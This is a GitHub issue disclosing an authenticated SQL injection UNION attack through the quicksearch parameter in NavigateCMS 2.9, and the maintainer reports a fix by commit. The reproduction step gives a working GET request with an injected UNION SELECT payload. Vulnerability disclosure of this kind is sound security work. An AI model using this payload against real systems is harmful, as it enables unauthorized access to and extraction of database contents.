Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection UNION attack with quicksearch parameter in NavigateCMS 2.9 #25

Closed
hydrasky-team opened this issue Jun 26, 2021 · 1 comment

Comments

@hydrasky-team
Copy link

EXPECTED BEHAVIOUR
An authenticated malicious user can take advantage of a SQL injection UNION attack vulnerability with quicksearch parameter in URL.

IMPACT
A successful SQL injection attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.

VULNERABILITY CODE
I found quicksearch parameter is not handled in SQL query with WHERE clause in \lib\packages\comments\comments.php

image

And the protect function in \lib\core\core.php is not use ESCAPE to filter special characters

image

Then it is use to query in: \lib\core\database.class.php

image

STEPS TO REPRODUCE

  1. We change the request in URL

GET /navigate/navigate/navigate.php?fid=comments&act=json&_search=true&quicksearch=%25")+UNION+ALL+SELECT+DATABASE(),null,null,null,null,null,null,VERSION()%3b--&_search=false&nd=1623493056682&rows=30&page=1&sidx=date_created&sord=desc&filters=

  1. And then we could exploit all the data.

image

@NavigateCMS
Copy link
Owner

Fixed by b2937f5

Thank you very much @hydrasky-team

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants